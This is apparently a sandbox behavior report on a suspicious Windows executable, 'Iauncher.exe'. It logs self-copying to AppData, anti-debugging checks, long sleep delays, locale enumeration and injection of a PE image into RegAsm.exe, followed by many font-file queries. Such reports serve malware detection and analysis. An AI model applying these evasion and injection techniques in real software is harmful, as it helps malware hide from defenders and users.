Source: C:\Users\user\Desktop\Iauncher.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Iauncher.exe, 00000000.00000002.3515556272.0000000005283000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1984404198.0000000005053000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe

Code function: 2_2_00F1AAD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_00F1AAD3

Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: 2_2_00F20E87 mov ecx, dword ptr fs:[00000030h]		2_2_00F20E87
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: 2_2_00F2A789 mov eax, dword ptr fs:[00000030h]		2_2_00F2A789

Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe

Code function: 2_2_00F2CD88 GetProcessHeap,

2_2_00F2CD88

Source: C:\Users\user\Desktop\Iauncher.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: 2_2_00F1AAD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00F1AAD3
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: 2_2_00F16A95 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00F16A95
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: 2_2_00F16D9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00F16D9F
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: 2_2_00F16EFB SetUnhandledExceptionFilter,	2_2_00F16EFB

Source: C:\Users\user\Desktop\Iauncher.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 779008	Jump to behavior

Source: C:\Users\user\Desktop\Iauncher.exe	Process created: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe "C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe

Code function: 2_2_00F1687C cpuid

2_2_00F1687C

Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: GetLocaleInfoW,	2_2_00F2C828
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	2_2_00F2C1C2
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_00F2C951
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: GetLocaleInfoW,	2_2_00F2CA57
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_00F2CB26
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: EnumSystemLocalesW,	2_2_00F2C4AF
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: EnumSystemLocalesW,	2_2_00F2C464
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_00F2C5D5
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: EnumSystemLocalesW,	2_2_00F2C54A
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: GetLocaleInfoW,	2_2_00F25D19
Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe	Code function: EnumSystemLocalesW,	2_2_00F257F3

Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Users\user\Desktop\Iauncher.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Iauncher.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
